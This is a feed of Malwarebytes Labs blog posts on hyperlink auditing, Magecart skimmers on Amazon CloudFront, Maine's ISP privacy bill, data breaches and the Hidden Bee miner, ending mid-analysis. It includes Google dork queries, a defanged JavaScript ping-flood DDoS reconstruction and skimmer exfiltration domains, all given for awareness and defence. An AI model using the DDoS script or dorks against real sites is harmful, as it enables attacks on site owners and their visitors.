Last of all—and most interesting—are the real world scenarios. These roughly resemble the main missions, but with the added spice of having to leave the game to go fact finding. You may have to hunt around in Google, or look for clues scattered across the Internet by the game developers.

Each mission comes with a briefing document explaining what you have to do, and from there on in, it’s time to grab whatever information you can find lying around online (for real) and pop your findings back into the game.

Click to enlarge

In keeping with the somewhat less Hollywood approach, the tasks and mission backgrounds are surprisingly serious and the monthly releases seem to follow “what if” stories about current events.

They deal with everything from infiltrating Emmanuel Macron’s files (topical!) to tackling methamphetamine shipments in South Korea, and helping to extract missing journalists investigating the internment of religious minorities in China. As I said…surprisingly serious.

Getting your gameface on

Most tasks begin by doing what you’d expect—poking around on the Internet for clues. When hackers want to compromise websites or servers, they often go Google dorking. This is essentially hunting around in search engines for telltale signs of passwords, exposed databases, or other things a website or server should keep hidden, but that an inattentive admin has left exposed.
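A few widely documented examples of the kind of queries involved, with example.com standing in for a real target (these are illustrative patterns, not queries from the game itself):

```
site:example.com intitle:"index of" "backup"    exposed directory listings
site:example.com filetype:sql "INSERT INTO"     leaked database dumps
site:example.com inurl:admin                    forgotten admin pages
```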

The idea in NITE Team 4 is to rummage around for subdomains and other points of interest that should’ve been hidden from sight and then exploit them ruthlessly. Different combinations of search and different tools provided by Stinger OS produce different results.

Once you have half a dozen subdomains, you begin to fingerprint each one and check for vulnerabilities. As is common throughout the game, you don’t get any sort of step-by-step walkthrough on how to break into servers for real. Many key tasks are left out, because they probably wouldn’t make for an interesting game, and frankly, there’s already more than enough here to figure out while keeping things accessible to newcomers.

Should you find a vulnerable subdomain, it’s then time to run the custom-made vulnerability database provided by Stinger OS, and then fire up the compromise tool (possibly the most “gamey” part of the process) that involves dragging and dropping aspects of the described vulnerability into the hacking tool and breaking into the computer/server/mobile phone.

From there, the mission usually diverges into aspects of security not typically covered in games. If anything, the nuts and bolts terminal stuff is less of a focus than working out how to exploit the fictitious targets away from your Stinger terminal. It feels a lot more realistic to me as a result.

What else can you do?

Before long, you’ll be trying various combinations of data about targets, and their day-to-day life, in the game’s XKeyscore tool to figure out patterns and reveal more information.

Click to enlarge

You’ll be using one of your VPNs to access a compromised network and use several techniques to crack a password. Maybe you won’t need to do that at all, because the target’s phone you just compromised has the password in plaintext in an SMS they sent their boss. What will you do if the password isn’t a password, but a clue to the password?

Click to enlarge

Once obtained, it might help reveal the location of a rogue business helping an insider threat hijack legitimate networks. How will you take them down? Will you try and break into their server? Could that be a trap? Perhaps you grabbed an email from the business card you downloaded. Is it worth firing up the phishing toolkit and trying to craft a boobytrapped email?

Click to enlarge

Would they be more likely to fall for a Word document or a Flash file? Should the body text resemble an accounting missive, or would a legal threat be more effective?

I hear those IoT smart homes are somewhat vulnerable these days. Anyone for BBQ?

Click to enlarge

…and so on.

I don’t want to give too much away, as it’s really worth discovering these things for yourself.

Hack the planet?

I mentioned earlier that I’d have been happy with just the tutorials to play around in. You’re not going to pop a shell or steal millions from a bank account by playing this game because ultimately it’s just that—a game. You’re dropped into specific scenarios, told to get from X to Y, and then you’re left to your own devices inside the hacker sandbox. If you genuinely want to try and tackle some of the basics of the trade, you should talk to security pros, ask for advice, go to conferences, take up a few courses, or try and grab the regular Humble Hacking Bundles.

Occasionally I got stuck and couldn’t figure out if I was doing something wrong, or the game was. Sometimes it expected you to input something as it presented it to you but didn’t mention you’d need to leave off the “/” at the end. Elsewhere, I was supposed to crack a password but despite following the instructions to the letter, it simply wouldn’t work—until it did.

Despite this, I don’t think I’ve played a game based on hacking with so many diverse aspects to it.

Bottom line: Is it realistic?

The various storyline scenarios are by necessity a little “out there.” You’re probably not going to see someone blowing up a house in Germany via remote controlled Hellfire missile strike anytime soon. But in terms of illustrating how many tools people working in this area use, how they use lateral thinking and clever connections to solve a puzzle and get something done, it’s fantastic. There are multiple aspects of this—particularly where dealing with OSINT, making connections, figuring out who did what and where are concerned—that I recognise.

While I was tying up this blog post, I discovered the developers are producing special versions of the game for training purposes. This doesn’t surprise me; I can imagine it has many applications, including making in-house custom security policy training a lot more fun and interesting for non-infosec employees.

Is this the best hacking game ever made? I couldn’t possibly say. Is it the most fleshed out? I would say so, and anyone looking for an occasionally tricky gamified introduction to digital jousting should give it a look. I’d have loved something like this when I was growing up, and if it helps encourage teenagers (or anyone else, for that matter) to look at security as a career option, then that can only be a bonus.

The post Video game portrayals of hacking: NITE Team 4 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hyperlink auditing: where has my option to disable it gone?

Malwarebytes - Thu, 06/06/2019 - 16:59

There is a relatively old method that might be gaining traction to follow users around on the world wide web.

Most Internet users are aware of the fact that they are being tracked in several ways. (And awareness is a good start.) In a state of awareness, you can adjust your behavior accordingly, and if you feel it’s necessary, you can take countermeasures.

Which is why we want to bring the practice of link auditing to your attention: to make you aware of its existence, if you weren’t already. For those already in the know, you might be surprised to learn that browsers are taking away your option to disable hyperlink auditing.

What is hyperlink auditing?

Hyperlink auditing is a method for website builders to track which links on their site have been clicked on by visitors, and where these links point to. Hyperlink auditing is sometimes referred to as “pings.” This is because “ping” is the name of the link attribute hyperlink auditing uses to do the tracking.

From a technical perspective, hyperlink auditing is an HTML standard that allows the creation of special links that ping back to a specified URL when they are clicked on. These pings are done in the form of a POST request to the specified web page that can then examine the request headers to see what page the link was clicked on.
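For the curious, such a ping request written out as raw HTTP looks roughly like this. All URLs are placeholder examples, and exact headers vary by browser; Ping-From, for instance, may be omitted for cross-origin pings:

```
POST /collect HTTP/1.1
Host: tracker.example.net
Content-Type: text/ping
Ping-From: https://shop.example.com/products.html
Ping-To: https://shop.example.com/checkout.html
Content-Length: 4

PING
```

The Ping-From header carries the page the link was clicked on, and Ping-To carries the link’s destination: exactly the two pieces of information a tracker wants.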

The syntax of this HTML5 feature is simple. A website builder can enable hyperlink auditing like this:

<a href="{destination url}" ping="{url that receives the information}">

Under normal circumstances, the second URL will point to some kind of script that will sort and store the received information to help generate tracking and usage information for the site. This can be done on the same domain, but it can also point to another domain or IP where the data can be processed.
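For instance, a concrete link feeding a cross-domain collection endpoint might look like this (both URLs here are hypothetical):

```html
<!-- The visitor lands on checkout.html as usual; meanwhile the browser
     quietly POSTs a notification to tracker.example.net. -->
<a href="https://shop.example.com/checkout.html"
   ping="https://tracker.example.net/collect">Proceed to checkout</a>
```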

What’s the difference between this and normal tracking?

Some of you might argue that there are other ways to track where we go and what we click. And you would be right. But those other methods use JavaScript, and browser users can choose whether or not to allow scripts to run. Hyperlink auditing does not give users this choice. If the browser allows it, it will work.

Which browsers allow link auditing?

Almost every browser allows hyperlink auditing, but until recently they offered an option to disable it. Now, major browsers are removing that option.

As of press time, Chrome, Edge, Opera, and Safari already allow link auditing by default and offer no option to disable it. Firefox plans to follow suit in the near future, which is surprising, as Firefox is one of the few browsers that has it disabled by default. Firefox users can check the setting for hyperlink auditing under about:config > browser.send_pings.

How can I stop link auditing?

You can’t detect the presence of the “ping” attribute by hovering over a link, so you would have to examine the site’s code to check whether a link carries it. Alternatively, for more novice users, there are dedicated browser extensions that block link auditing. For Chrome users, there is an extension called Ping Blocker available in the Web Store.

Or you can resort to using a browser that is more privacy focused.

Please read: How to tighten security and increase privacy on your browser

Test if your browser allows hyperlink auditing

The link I posted below is harmless: it pings a test IP we created especially to check whether the Malwarebytes web protection module is working, without actually sending you to a malicious site. This test will show a warning prompt if the following conditions are met:

  • Malwarebytes Web Protection module is enabled
  • You are allowing Malwarebytes notifications (Settings > Notifications)
  • Your browser allows link auditing

Create a text file with the code posted below in it and save it as an HTML file. Right-click the HTML file and choose to open it with the browser you want to test. If the browser allows link auditing, you should see the warning shown below when you click this link:

<a href="" ping="">The ping in this link will be blocked by MBAM</a>

Malwarebytes and hyperlink auditing

As demonstrated above, Malwarebytes will protect you if either one of the URLs in a link leads to a known malicious domain or IP. There are no immediate plans to integrate anti-ping functionality in our browser extensions, but it is under consideration. Should the need arise for this functionality to be integrated in any of our products, we will lend a listening ear to our customers.

Abuse of hyperlink auditing

Hyperlink auditing has reportedly been used in a DDoS attack. The attack involved users who visited a crafted web page that loaded two external JavaScript files. One of these included an array of URLs: the targets of the DDoS attack. The second JavaScript file randomly selected a URL from the array, created an <a> tag with a ping attribute, and programmatically clicked the link every second.
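Based on that description, the core of such an attack page can be sketched in a few lines. This is a defanged reconstruction, not the actual attack code; every URL below is a placeholder:

```html
<script>
  // Hypothetical reconstruction of the reported ping-based DDoS technique.
  var targets = [
    "https://victim-one.example/",
    "https://victim-two.example/"
  ];
  setInterval(function () {
    var a = document.createElement("a");
    a.href = "https://harmless.example/";  // where the click appears to go
    // The ping target is who actually receives the POST:
    a.ping = targets[Math.floor(Math.random() * targets.length)];
    document.body.appendChild(a);
    a.click();   // the programmatic click fires the ping request
    a.remove();
  }, 1000);      // one request per second, per visitor
</script>
```

Every visitor who keeps such a page open contributes a steady trickle of requests, which adds up quickly across thousands of visitors.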

Skimmers could also abuse hyperlink auditing if they figured out how to send form field information to a site under their control. If they could plant a script on a site, as they usually do, but use it to “ping” the data to their own site, the technique would be hard for visitors to block or even notice.


At the moment, there doesn’t seem to be an urgent need for the average Internet user to block hyperlink auditing. The real problem is that it takes third-party software to disable hyperlink auditing when browsers should be offering us that option in their settings. More careful Internet users who disabled hyperlink auditing earlier should check whether that setting is still effective after each browser update; the option could be removed in an update without you noticing.

Stay safe everyone!

The post Hyperlink auditing: where has my option to disable it gone? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes Labs wins best cybersecurity vendor blog at InfoSec’s European Security Blogger Awards

Malwarebytes - Wed, 06/05/2019 - 19:21

Infosec Europe is now well underway, and last night was the annual EU Security Blogger Awards, where InfoSecurity Magazine:

…recognise[s] the best blogs in the industry as first nominated by peers and then judged by a panel of (mostly) respected industry experts.

Malwarebytes Labs was announced as winner of the Best Cybersecurity Vendor Blog. We previously won best corporate security blog in 2015 and 2016, and we were delighted to see we had several other nominations this year:

  • Best commercial Twitter account (@Malwarebytes)
  • Most educational blog for user awareness
  • Security hall of fame (for our own Jérôme Segura)
  • Grand Prix for best overall blog

It’s excellent to be recognised alongside such legendary security pros as Graham Cluley, Mikko Hyppönen, and Troy Hunt, as well as fellow security companies Tripwire, Sophos, Bitdefender, and many others. Without further ado, let’s see who won in the various categories.

The n00bs: Best new cybersecurity podcast

WINNER: Darknet Diaries

The n00bs: Best new/up and coming blog

WINNER: The Many Hats Club

The corporates: Best cybersecurity vendor blog

WINNER: Malwarebytes

The corporates: Best commercial Twitter account


Best cybersecurity podcast

WINNER: Smashing Security

Best cybersecurity video or cybersecurity video blog

WINNER: Jenny Radcliffe

Best personal (non-commercial) security blog

WINNER: 5w0rdFish

Most educational blog for user awareness


Most entertaining blog


Best technical blog

WINNER: Kevin Beaumont

Best Tweeter

WINNER: Quentynblog

Best Instagrammer

WINNER: Lausecurity

The legends of cybersecurity: hall of fame

WINNER: Troy Hunt

Grand Prix for best overall security blog

WINNER: Graham Cluley

Thank you!

We did indeed win an award thanks to your votes, and we can now set our Best Cybersecurity Vendor Blog trophy next to our two awards for Best Corporate Blog. We’ll continue to provide our readers with breaking news, in-depth research, educational guides on best practices, conference coverage, and much, much more.

We appreciate your votes, especially when there are so many excellent blogs out there, and we hope you might even find a few more valuable sources of information from the links above.

Congratulations to the winners, commiserations to everyone else, a hat-tip to the organisers, and a final round of applause to our readers. We couldn’t have done it without you.

The post Malwarebytes Labs wins best cybersecurity vendor blog at InfoSec’s European Security Blogger Awards appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Maine inches closer to shutting down ISP pay-for-privacy schemes

Malwarebytes - Wed, 06/05/2019 - 15:00

Maine residents are one step closer to being protected from the unapproved use, sharing, and sale of their data by Internet service providers (ISPs). A new state bill, already approved by the state House of Representatives and Senate, awaits the governor’s signature.

If signed, the bill would provide some of the strongest data privacy protections in the United States, putting a latch on emails, online chats, browser history, IP addresses, and geolocation data collected and stored by ISPs like Verizon, Comcast, and Spectrum. The bill goes further: Unlike a data privacy proposal in the US and a new data privacy law in California, the Maine bill explicitly shuts down any pay-for-privacy schemes.

The Act to Protect the Privacy of Online Customer Information (or LD 946 for short) would go into effect on July 1, 2020. It is, with minor exception, widely supported, even among its intended targets.

“We sell Internet access, and we know that if people can’t trust the Internet, then the value of the Internet is significantly lessened, as it will be used less for sensitive applications,” wrote Fletcher Kittredge and Kerem Durdag, CEO and COO of Maine-based ISP GWI. “Even if government regulation blocks us from making money selling customer data (something we never ever do), we still benefit because a trusted Internet is more valuable to all our customers.”

Not everyone agrees, though.

The Maine State Chamber of Commerce opposes the bill and, following the Senate’s unanimous approval last week (35–0), has vowed to “ensure that this harmful bill does not become law.”

The Chamber’s arguments have puzzled the ACLU of Maine, a supporter of LD 946. According to the nonprofit, the Chamber has engaged in “gaslighting” and “disingenuous” advertising, serving as a mouthpiece for the region’s big ISPs.

The Chamber did not respond to requests for comment.

Further, the Chamber commissioned a public survey that handwaves away the actual matter at hand: Should ISPs be restricted from selling user data?

To the ACLU of Maine, that answer is clear: Yes.

“This bill protects Mainers from having their ISPs sell their data without their knowledge and consent,” said Oamshri Amarasingham, advocacy director of ACLU of Maine.

The bill

Sponsored by Maine state Democratic Senator Shenna Bellows, LD 946 would prohibit ISPs from using, disclosing, selling, or allowing access to customers’ “personal information.” That includes the content of online communications, web browsing history, app usage history, “precise geolocation information,” and health and financial information.

This bill does not exist in a vacuum. In February, Motherboard revealed that, for years, actual, honest-to-God bounty hunters could access the location data of AT&T, T-Mobile, and Sprint customers. It gets better (worse): The location data was initially intended for 911 operators, but was sold to data aggregators by the telecom companies themselves.

Away from bounty hunter headlines, The Verge also spotlighted AT&T’s future profiteering plans last month to monetize nearly every piece of its customers’ data.

Under LD 946, that activity would be regulated.

The bill allows for some exceptions. An ISP could sell user data so long as the user consents to that sale, and ISPs could also use and disclose user data when complying with court orders, rendering bills, protecting users from fraud and abuse, and providing their services, so long as the user data is necessary to those services. Further, ISPs could disclose geolocation data in the case of emergencies, like dispatching 911 services.

The bill also closes a few potential loopholes, prohibiting ISPs from requiring that users consent to the sale of their data in order to use their services. The bill also states that ISPs must provide “clear, conspicuous, and nondeceptive notice” when users consent to sell their data.

Finally, the bill shuts down any “pay-for-privacy” schemes that have already proved popular. According to the bill, ISPs cannot “charge a customer a penalty or offer a customer a discount based on the customer’s decision to provide or not provide consent” to having their data sold, shared, or accessed by third parties.


As we previously wrote about Sen. Ron Wyden’s data privacy proposal, which includes a pay-for-privacy stipulation:

“[Pay-for-privacy] casts privacy as a commodity that individuals with the means can easily purchase. But a move in this direction could further deepen the separation between socioeconomic classes. The ‘haves’ can operate online free from prying eyes. But the ‘have nots’ must forfeit that right.”

The Maine state bill does its part to prevent that unequal outcome.

Maine Governor Janet Mills has until June 11 to sign the bill and turn it into law. If she misses the deadline, the bill automatically becomes law.

Amarasingham of ACLU of Maine expects a positive outcome.

“We are optimistic that [Governor Mills] will sign this bill,” Amarasingham said. “I know ISPs and the Chamber of Commerce are exerting a lot of pressure, but I’m proud to say Maine legislators didn’t cave to that. I hope the governor’s office won’t either.”

The opposition

The challenge to LD 946 includes claims of insufficiency, unproven rhetoric, misleading statistics, and a question as to what legislation should accomplish.

As Amarasingham said, one of the bill’s main opponents is the Maine State Chamber of Commerce. In recent months, the Chamber funded a 30-second video ad criticizing the bill, hired a research firm to conduct public surveys about data privacy, and launched a website that asked Maine residents to tell their representatives to vote against the bill.

That website labeled LD 946 as “harmful to Maine’s consumers,” because, allegedly, the bill “will create greater consumer confusion and undermine consumers’ confidence in their online activities—a risk to the continued growth of the digital economy.”

That confusion argument showed up in a Central Maine opinion piece written by Mid-Maine Chamber of Commerce president and CEO Kimberly Lindlof. Lindlof wrote that a “patchwork” of state data privacy laws—with different standards across different state lines—could create a scenario where Maine residents “might have to opt in to a privacy setting in Maine but opt out of that setting if you go into another state for vacation.”

But the Mid-Maine Chamber of Commerce and the Maine State Chamber of Commerce both oppose LD 946 for another reason: The bill does not go far enough.

According to both agencies, LD 946 should apply not just to companies that provide Internet service, but also to companies that operate their businesses online, such as Google and Facebook. The Chamber’s video ad, which it posted on Facebook, said that “it doesn’t make sense” to leave out these big Silicon Valley tech companies, which have repeatedly failed to protect user data. (The video ad also claims that LD 946 “exempts Facebook,” which is flatly untrue—it simply does not apply to Facebook. There are no written exemptions for the company.)

Boiled down, the Chamber wants a stronger bill.

However, this is an ideological argument about policy: Should legislation immediately achieve broad goals, or should it take individual steps towards those goals?

According to Amarasingham, the reality of policy-making is the latter.

“The nature of legislation and law reform is that it is incremental,” she said. “There is no one bill on any issue that solves an entire problem. This bill is an enormous first step and it is very important.”

Following the Senate’s approval of LD 946 last week, the Chamber responded on its website:

“Today the State Senate failed to protect the online privacy of all Maine consumers in passing LD 946, a fundamentally flawed bill that will do little to make Mainers’ personal privacy more secure on the Internet. Despite the fact that 87% [nearly 90%] of Mainers believe a state law should apply to all companies on the Internet according to a recent survey, senators chose to pass a bill that leaves consumers’ personal data unprotected when they are using websites, search engines, and social media apps.”

Those statistics deserve scrutiny.

The statement cites a Chamber-funded survey by David Binder Research, in which the firm conducted 600 telephone interviews between May 9 and May 11. The statistic referenced by the Chamber pertains to this question:

“If the Maine state legislature were to pass a law today to protect your personal privacy, should this law apply to just a few companies on the Internet, with the idea of passing more law [sic] in the future to cover additional companies on the Internet, or should this law apply to all companies?”

According to the survey, 87 percent of respondents answered “All companies.”

But that question asks respondents to make a choice between two entirely different things—one of them literally exists and the other does not.

LD 946, which applies to a “few companies,” is written. A bill that applies to “all companies” is not. This is a choice between reality and possibility.

Further, the question’s language obfuscates a core difference between “companies on the Internet”—like Google and Facebook—and companies that provide the Internet. These are not the same.

The Maine State Chamber of Commerce did not respond to emailed questions about when it last created a website campaign against a bill, or about why it believes the potential for broader privacy protections supersedes the current bill’s incremental protections. The Chamber also did not reply to a voicemail providing similar questions.

If at this point, you’re confused about how incremental protections against sneaky ISP behavior could be seen as “harmful,” you’re not alone. Tracking the Chamber’s privacy-protective messaging against its anti-ISP-protection messaging can make anyone’s head spin.

“I can’t say that I fully understand why the Chamber is carrying Spectrum and AT&T’s water on this,” Amarasingham said. “Their top line, outward-facing message was Mainers deserve privacy protections, which is also our top line message.”

Amarasingham continued: “This is real privacy protection.”

Data privacy shoulds and should-nots

Should rules be written to stop Facebook and Google and dozens of Silicon Valley tech companies from profiting off your data? That depends on several factors, like what those rules would look like, how they would be implemented and enforced, and what exemptions would apply, not to mention whether those rules would nullify current state rules that are being pushed forward today.

But should ISPs be allowed to sell user data without consent when there is already a widely-supported plan in place to stop them? Absolutely not.

The post Maine inches closer to shutting down ISP pay-for-privacy schemes appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Magecart skimmers found on Amazon CloudFront CDN

Malwarebytes - Tue, 06/04/2019 - 15:00

Update (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected. Our crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official website.

The skimmer was inserted in this JavaScript library:


Interestingly, this same library had already been altered (loading content from installw[.]com) some time earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the page can be found here.

Late last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network (CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.

Although attacks that involve CDNs usually affect a large number of web properties at once via their supply chain, this isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or link to code developed specifically for them and hosted on a custom AWS S3 bucket.

Without properly validating content loaded externally, these sites are exposing their users to various threats, including some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of a campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.

The ideal place to conceal a skimmer

CDNs are widely used because they provide great benefits to website owners, including optimizing load times and cost, as well as helping with all sorts of data analytics.

The sites we identified during a crawl had nothing in common other than the fact they were all using their own custom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN repository would be themselves.

This first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer can be seen appended to the original code and using obfuscation to conceal itself.

Site loading a compromised JavaScript library from its own AWS S3 bucket

This second case shows the skimmer injected not just in one library, but several contained within the same directory, once again part of an S3 bucket that is only used by this one website.

Fiddler traffic capture showing multiple JavaScript files on AWS injected with skimmer

Finally, here’s another example where the skimmer was injected in various scripts loaded from a custom CloudFront URL.

Fiddler traffic capture showing skimmer injected in a custom CloudFront repository

Exfiltration gate

This skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the exfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the criminal infrastructure.
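Assuming the layers are applied in the order described (hex first, then Base64), decoding simply runs in reverse. A minimal sketch, using a made-up sample string rather than the actual skimmer payload:

```python
import base64

def decode_gate(blob: str) -> str:
    # Reverse the two encoding layers: Base64 on the outside,
    # hex on the inside (order per the description above).
    hex_layer = base64.b64decode(blob).decode("ascii")
    return bytes.fromhex(hex_layer).decode("ascii")

# Hypothetical sample built the same way, NOT taken from the real skimmer:
sample = base64.b64encode("cdn-imgcloud[.]com".encode().hex().encode()).decode()
print(decode_gate(sample))  # cdn-imgcloud[.]com
```

Layered encodings like this add no real secrecy, but they are enough to defeat naive string searches for the gate domain.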

While we would have expected to see many Magento e-commerce shops, some of the victims included a news portal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content Management Systems (CMSes).

Snippet of the skimmer code showing functions used to exfiltrate data

As such, many did not even have a payment form within their site. Most simply had a sign up or login form instead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the CDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to valuable infrastructure from which they can steal input data.

Connection with existing campaign

The skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the same exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent supply-chain attacks.

RiskIQ, in partnership with the Shadowserver Foundation, sinkholed both that domain and another (ww1-filecloud[.]com) in an effort to disrupt the criminals’ infrastructure.

Comparison snapshots: the exfiltration gate changing after original domain gets sinkholed

A cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the RiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.

Creation Date: 2019-05-16T07:12:30Z
Registrar: Shinjiru Technology Sdn Bhd
Name Server: NS1.CARBON2U.COM
Name Server: NS2.CARBON2U.COM

The domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the same subnet, we can find other exfiltration gates also registered recently.

VirusTotal graph showing new gates and revealing that old gates are back online

What we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-filecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the hands of the criminals.

Historical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161. The same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.

Finding and exploiting weaknesses

This type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit anything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a viable option, so they will look for other ways.

While this example is not a third-party script supply-chain attack, it is served from third-party infrastructure. Beyond applying the same level of access control to your own CDN-hosted repositories as your actual website, other measures—such as validation of any externally loaded content (via Subresource Integrity checks, for example)—can save the day.
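For illustration, the integrity value for a Subresource Integrity check is just a Base64-encoded digest of the exact bytes of the hosted library. A minimal sketch (file contents and URL below are placeholders):

```python
import base64
import hashlib

def sri_hash(script_bytes: bytes) -> str:
    # SRI integrity value: "<algo>-<base64 digest>"; sha384 is a common choice.
    digest = hashlib.sha384(script_bytes).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")

# The value then goes into the script tag, e.g.:
#   <script src="https://cdn.example.com/lib.js"
#           integrity="sha384-..." crossorigin="anonymous"></script>
print(sri_hash(b"console.log('hi');"))
```

If the CDN-hosted copy is tampered with, the digest no longer matches and the browser refuses to execute the script, which would have stopped these injected skimmers from running.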

We reached out to the victims we identified in this campaign and several have already remediated the breach. In other cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the skimmers mentioned in this blog and the new ones we discover each day.

Indicators of Compromise (IoCs)


The post Magecart skimmers found on Amazon CloudFront CDN appeared first on Malwarebytes Labs.


A week in security (May 27 – June 2)

Malwarebytes - Mon, 06/03/2019 - 17:09

Last week on Malwarebytes Labs, we took readers through a deep dive—way down the rabbit hole—into the novel malware called “Hidden Bee.” We also looked at the potential impact of a government agency’s privacy framework, and delivered to readers everything they needed to know about ATM attacks and fraud. Lastly, amidst continuing news about the City of Baltimore suffering a ransomware attack, we told readers what they should do to prepare themselves against similar threats.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (May 27 – June 2) appeared first on Malwarebytes Labs.


Leaks and breaches: a roundup

Malwarebytes - Mon, 06/03/2019 - 16:47

It’s time for one of our semi-regular breach/data exposure roundup blogs, as the last few days have brought us a few monsters. If you use any of the below sites, or if you think some of your data has been sitting around exposed, we’ll hopefully give you a better idea of what the issue is.

Seeing so many services be compromised or simply exposed for all to see without being secured is rather fatiguing, and we’d hate for the end result to be hands thrown in the air with a cry of “Why bother!” Without further ado, then, let’s take a look at breach number one.

Canva: Breached

Something in the region of 139 million users of graphic design service Canva had their data swiped by a hacker known for many other large compromises. Usernames, emails, real names, and cities were amongst the data swiped. A big chunk of users had a combination of password hashes and Google tokens grabbed, too.

There are some issues with how Canva initially reported this. The “we’ve been hacked” message, followed by a short email ramble about free images, led to concerns that many users may have ignored it completely. However, Canva has been quick to deal with the problem at hand and even has (shock, horror, and amazement) a good slice of information about it on its status page. In fact, it has even more information on a dedicated update portal.

In a nutshell, Canva states that your login passwords are unreadable, other credentials are similarly secure, your designs are safe, your card details haven’t been grabbed, and you should change your login as a precautionary measure.


Flipboard: breached

Breach number two: Massively successful news aggregator Flipboard was also hit by an attack, according to a statement released on May 28. This attack took place sometime between June 2018 and March 2019. They haven’t said how many accounts were breached, but as with Canva, they were careful to stress that stolen logins would be incredibly difficult to break into, thanks to the fact that they didn’t store passwords in plain text. Additionally, they’ve reset everybody’s login credentials as a precautionary security response.

The attackers grabbed the usual collection of valuables: usernames, hashed/salted passwords, some email addresses, and third-party digital tokens. As with the Canva breach, Flipboard has been upfront about the whole fiasco and are being a lot more proactive than many companies faced with similar situations.

Amazingco: exposed data

Next up, we have another example of “utterly unsecured database full of information readily available to someone with a web browser.” This is incredibly common, and a major source of data breaches/leaks. Hacking into servers, exploiting databases, phishing logins from admins? Too much hard work. Criminals need only go looking for wide-open goal areas instead.

In this case, the open goal belonged to an Australian marketing company called Amazingco. 174,000 records were there for the taking, containing everything from names and addresses to phone numbers, event types, and even IP addresses and ports.

We don’t know how long the data was sitting there, and we also don’t know if this information was meant to be sitting on the open Internet, or if someone possibly misconfigured something. What we do know is that this database has now been taken offline.

At this stage, there’s no real way to know if someone up to no good has grabbed it. However, if people with good intentions could find it, then so, too, could bad ones. Customers of Amazingco should be wary of attacks, as spear phishing will likely now be the order of the day.

First American Financial Corp: exposed data

Possibly the largest and most damaging of the bunch, our fourth incident is another one where data is freely available to someone sporting a web browser. First American Financial Corp had “hundreds of millions of documents related to mortgage deals, going back to 2003” digitised and ready to view without authentication.

Social security numbers, driver’s licenses, account statements, wire transaction records, bank account numbers, and much more were all lurking in the pile. That pile was estimated to weigh in at around 885 million files, and as security researcher Brian Krebs notes, this would be an absolute gold mine for phishers and purveyors of Business Email Compromise scams. The data has now been taken offline, but that’s scant consolation for anyone affected.

What’s the upshot?

Don’t panic, but do be cautious. According to security firm Mimecast, 65 percent of organisations saw an increase in impersonation attempts year over year. Some of the above leaks could be extremely useful to scammers wanting to muscle in on victims, and you never know when someone’s going to try it on. The slightest bit of inattentiveness could lead to a spectacular mishap, and we don’t want that taking place.

The post Leaks and breaches: a roundup appeared first on Malwarebytes Labs.


Hidden Bee: Let’s go down the rabbit hole

Malwarebytes - Fri, 05/31/2019 - 17:32

Some time ago, we discussed an interesting piece of malware, Hidden Bee. It is a Chinese miner, composed of userland components as well as a bootkit part. One of its unique features is a custom format used for some of the high-level elements (this format was featured in my recent presentation at SAS).

Recently, we stumbled upon a new sample of Hidden Bee. As it turns out, its authors decided to redesign some elements, as well as the formats used. In this post, we will take a deep dive into the functionality of the loader and the changes that were introduced.


831d0b55ebeb5e9ae19732e18041aa54 – shared by @James_inthe_box


Hidden Bee runs silently—only increased processor usage can hint that the system is infected. More can be revealed with the help of tools inspecting the memory of running processes.

Initially, the main sample installs itself as a Windows service:

Hidden Bee service

However, once the next component is downloaded, this service is removed.

The payloads are injected into several applications, such as svchost.exe, msdtc.exe, dllhost.exe, and WmiPrvSE.exe.

If we scan the system with hollows_hunter, we can see that there are some implants in the memory of those processes:

Results of the scan by hollows_hunter

Indeed, if we take a look inside each process’ memory (with the help of Process Hacker), we can see atypical executable elements:

Hidden Bee implants are placed in RWX memory

Some of them are lacking typical PE headers, for example:

Executable in one of the multiple customized formats used by Hidden Bee

But in addition to this, we can also find PE files implanted at unusual addresses in the memory:

Manually-loaded PE files in the memory of WmiPrvSE.exe

Those manually-loaded PE files turned out to be legitimate DLLs: OpenCL.dll and cudart32_80.dll (NVIDIA CUDA Runtime, version 8.0.61). CUDA is a technology for NVIDIA graphics cards, so their presence suggests that the malware uses the GPU to boost its mining performance.

When we inspect the memory even closer, we can see that within the executable implants there are some strings referencing Lua components:

Strings referencing the Lua scripting language, used by Hidden Bee components

Those strings are typical for the Hidden Bee miner, and they were also mentioned in the previous reports.

We can also see the strings referencing the mining activity, i.e. the Cryptonight miner.

List of modules:


And we can even retrieve the miner configuration:

Inside

